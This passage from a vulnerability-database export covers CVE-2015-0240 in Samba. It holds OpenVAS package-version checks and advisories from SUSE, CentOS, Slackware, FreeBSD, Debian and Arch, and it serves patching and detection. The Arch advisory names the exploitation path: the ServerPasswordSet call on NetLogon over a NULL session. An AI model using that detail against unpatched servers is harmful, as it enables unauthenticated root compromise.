USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850777\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 15:27:20 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for Samba SUSE-SU-2015:0371-1 (Samba)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba has been updated to fix one security issue:\n\n * CVE-2015-0240: Don't call talloc_free on an uninitialized pointer\n (bnc#917376).\n\n Additionally, these non-security issues have been fixed:\n\n * Realign the winbind request structure following\n require_membership_of field expansion (bnc#913001).\n\n * Reuse connections derived from DFS referrals (bso#10123,\n fate#316512).\n\n * Set domain/workgroup based on authentication callback value\n (bso#11059).\n\n * Fix spoolss error response marshalling (bso#10984).\n\n * Fix spoolss EnumJobs and GetJob responses (bso#10905, bnc#898031).\n\n * Fix handling of bad EnumJobs levels (bso#10898).\n\n * Fix small memory-leak in the background print process (bnc#899558).\n\n * Prune idle or hung connections older than 'winbind request timeout'\n (bso#3204, bnc#872912).\");\n\n script_tag(name:\"affected\", value:\"Samba on SUSE Linux Enterprise Server 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0371_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~12.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:04", "bulletinFamily": "scanner", "description": "Check the version of libsmbclient", "modified": "2019-03-11T00:00:00", "published": "2015-02-25T00:00:00", "id": "OPENVAS:1361412562310882121", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882121", "title": "CentOS Update for libsmbclient CESA-2015:0252 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2015:0252 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882121\");\n script_version(\"$Revision: 14095 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-11 14:54:56 +0100 (Mon, 11 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-25 05:42:42 +0100 (Wed, 25 Feb 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for libsmbclient CESA-2015:0252 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of libsmbclient\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nlinked at the references.\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0252\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-February/020945.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1346913\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient\", rpm:\"libwbclient~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-dc\", rpm:\"samba-dc~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-dc-libs\", rpm:\"samba-dc-libs~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-pidl\", rpm:\"samba-pidl~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-python\", rpm:\"samba-python~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-test\", rpm:\"samba-test~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-test-devel\", rpm:\"samba-test-devel~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-vfs-glusterfs\", rpm:\"samba-vfs-glusterfs~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-modules\", rpm:\"samba-winbind-modules~4.1.1~38.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "description": "Uninitilezed pointer free'ing potentially leads to code execution.", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "SECURITYVULNS:VULN:14289", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14289", "title": "Samba memory corruption", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2019-05-30T07:36:59", "bulletinFamily": "unix", "description": "New samba packages are available for Slackware 14.1 and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/samba-4.1.17-i486-1_slack14.1.txz: Upgraded.\n This package fixes security issues since the last update:\n BUG 11077: CVE-2015-0240: talloc free on uninitialized stack pointer\n in netlogon server could lead to security vulnerability.\n BUG 11077: CVE-2015-0240: s3-netlogon: Make sure we do not deference\n a NULL pointer.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0240\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/samba-4.1.17-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/samba-4.1.17-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/samba-4.2.0-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/samba-4.2.0-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 package:\nfffb6719ef4cfe66e17fdb6924b46d36 samba-4.1.17-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n843d5224ac74e82c633df875ca4d2386 samba-4.1.17-x86_64-1_slack14.1.txz\n\nSlackware -current package:\ne0af5f21bc77e20bf6ade257160cc077 n/samba-4.2.0-i486-1.txz\n\nSlackware x86_64 -current package:\nf497a197850263144c211e7cd349d5bb n/samba-4.2.0-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg samba-4.1.17-i486-1_slack14.1.txz\n\nThen, if Samba is running restart it:\n > /etc/rc.d/rc.samba restart", "modified": "2015-03-05T14:49:31", "published": "2015-03-05T14:49:31", "id": "SSA-2015-064-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.360345", "title": "samba", "type": "slackware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0250\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-February/020944.html\n\n**Affected packages:**\nsamba4\nsamba4-client\nsamba4-common\nsamba4-dc\nsamba4-dc-libs\nsamba4-devel\nsamba4-libs\nsamba4-pidl\nsamba4-python\nsamba4-swat\nsamba4-test\nsamba4-winbind\nsamba4-winbind-clients\nsamba4-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0250.html", "modified": "2015-02-23T14:24:03", "published": "2015-02-23T14:24:03", "href": "http://lists.centos.org/pipermail/centos-announce/2015-February/020944.html", "id": "CESA-2015:0250", "title": "samba4 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:47", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0251\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-February/020943.html\n\n**Affected packages:**\nlibsmbclient\nlibsmbclient-devel\nsamba\nsamba-client\nsamba-common\nsamba-doc\nsamba-domainjoin-gui\nsamba-glusterfs\nsamba-swat\nsamba-winbind\nsamba-winbind-clients\nsamba-winbind-devel\nsamba-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0251.html", "modified": "2015-02-23T14:23:09", "published": "2015-02-23T14:23:09", "href": "http://lists.centos.org/pipermail/centos-announce/2015-February/020943.html", "id": "CESA-2015:0251", "title": "libsmbclient, samba security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0249\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nAn uninitialized pointer use flaw was found in the Samba daemon (smbd).\nA malicious Samba client could send specially crafted netlogon packets\nthat, when processed by smbd, could potentially lead to arbitrary code\nexecution with the privileges of the user running smbd (by default, the\nroot user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges Richard van Eeden of Microsoft Vulnerability Research\nas the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-February/020942.html\n\n**Affected packages:**\nsamba3x\nsamba3x-client\nsamba3x-common\nsamba3x-doc\nsamba3x-domainjoin-gui\nsamba3x-swat\nsamba3x-winbind\nsamba3x-winbind-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0249.html", "modified": "2015-02-23T14:18:15", "published": "2015-02-23T14:18:15", "href": "http://lists.centos.org/pipermail/centos-announce/2015-February/020942.html", "id": "CESA-2015:0249", "title": "samba3x security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:19", "bulletinFamily": "unix", "description": "\nSamba development team reports:\n\nAll versions of Samba from 3.5.0 to 4.2.0rc4 are\n\t vulnerable to an unexpected code execution vulnerability\n\t in the smbd file server daemon.\nA malicious client could send packets that may set up the\n\t stack in such a way that the freeing of memory in a\n\t subsequent anonymous netlogon packet could allow execution\n\t of arbitrary code. This code would execute with root\n\t privileges.\n\n", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "id": "996C219C-BBB1-11E4-88AE-D050992ECDE8", "href": "https://vuxml.freebsd.org/freebsd/996c219c-bbb1-11e4-88ae-d050992ecde8.html", "title": "samba -- Unexpected code execution in smbd", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:22:41", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3171-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nFebruary 23, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nCVE ID : CVE-2015-0240\n\nRichard van Eeden of Microsoft Vulnerability Research discovered that\nSamba, a SMB/CIFS file, print, and login server for Unix, contains a\nflaw in the netlogon server code which allows remote code execution with\nroot privileges from an unauthenticated connection.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2:3.6.6-6+deb7u5.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2015-02-23T11:49:04", "published": "2015-02-23T11:49:04", "id": "DEBIAN:DSA-3171-1:460B1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00055.html", "title": "[SECURITY] [DSA 3171-1] samba security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:45", "bulletinFamily": "unix", "description": "Package : samba\nVersion : 2:3.5.6~dfsg-3squeeze12\nCVE ID : CVE-2015-0240\nDebian Bug : 779033\n\nRichard van Eeden of Microsoft Vulnerability Research discovered that\nSamba, a SMB/CIFS file, print, and login server for Unix, contains a\nflaw in the netlogon server code which allows remote code execution with\nroot privileges from an unauthenticated connection.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2:3.6.6-6+deb7u5.\n\nWe recommend that you upgrade your samba packages.\n-- \nRapha\u00ebl Hertzog \u25c8 Debian Developer\n\nSupport Debian LTS: http://www.freexian.com/services/debian-lts.html\nLearn to master Debian: http://debian-handbook.info/get/\n", "modified": "2015-02-23T17:00:59", "published": "2015-02-23T17:00:59", "id": "DEBIAN:DLA-156-1:7AF41", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201502/msg00010.html", "title": "[SECURITY] [DLA 156-1] samba security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "bulletinFamily": "unix", "description": "A malicious client could send packets that may set up the stack in such\na way that the freeing of memory in a subsequent anonymous netlogon\npacket could allow execution of arbitrary code. This code would execute\nwith root privileges.\n\nThis flaw arises because of an uninitialized pointer is passed to the\nTALLOC_FREE() function. (Samba uses embedded talloc for memory\nmanagement and does not rely on the glibc malloc family to function). It\ncan be exploited by calling the ServerPasswordSet RPC api on the\nNetLogon endpoint, by using a NULL session over IPC.\n\nIn Samba 4.1 and above, this crash can only be triggered after setting\n“server schannel = yes” in the server configuration. This is due to the\nadbe6cba005a2060b0f641e91b500574f4637a36 commit, which introduces NULL\ninitialization into the most common code path. It is still possible to\ntrigger an early return with a memory allocation failure, but that is\nless likely to occur.", "modified": "2015-02-23T00:00:00", "published": "2015-02-23T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-February/000236.html", "id": "ASA-201502-13", "title": "samba: arbitrary code execution", "type": "archlinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T10:06:53", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-jQE8I1RMbKQ/VOxakIAKyyI/AAAAAAAAh9U/1jpbugJ6eb8/s1600/samba-windows-linux-server.png>)\n\nA critical vulnerability has been fixed in **Samba** \u2014 Open Source standard Windows interoperability suite of programs for Linux and Unix, that could have allowed hackers to [remotely execute an arbitrary code](<https://thehackernews.com/search/label/Remote%20code%20execution%20vulnerability>) in the Samba daemon (_smbd_).\n\n \n\n\nSamba is an open source implementation of the SMB/CIFS network file sharing protocol that works on the majority of operating systems available today, which allows a non-Windows server to communicate with the same networking protocol as the Windows products. Samba is supported by many operating systems including Windows 95/98/NT, OS/2, and Linux.\n\n \n\n\n_smbd_ is the server daemon of Samba which provides file sharing and printing services to clients using the SMB/CIFS protocol. Samba is also sometimes installed as a component of *BSD and OS X systems.\n\n \n\n\nThe vulnerability, designated as __CVE-2015-0240__, actually resides in this smbd file server daemon. The bug can be exploited by hackers to potentially execute code remotely with root privileges, the Samba development team [warned](<https://www.samba.org/samba/security/CVE-2015-0240>). \n\n \n\n\nThe team discovered that the vulnerability allowed a malicious client to send some packets that could free memory in a consecutive anonymous netlogon packet, leading to unexpected execution of random code. In case, root privileges are required which is automatic and no login or authentication is necessary.\n\n \n\n\nThe security vulnerability affects all versions of the Samba software, from the oldest supported stable release, Samba versions 3.5.0, to the current development version, 4.2.0 Release Candidate (RC) 4, the Samba Project said in a security alert.\n\n 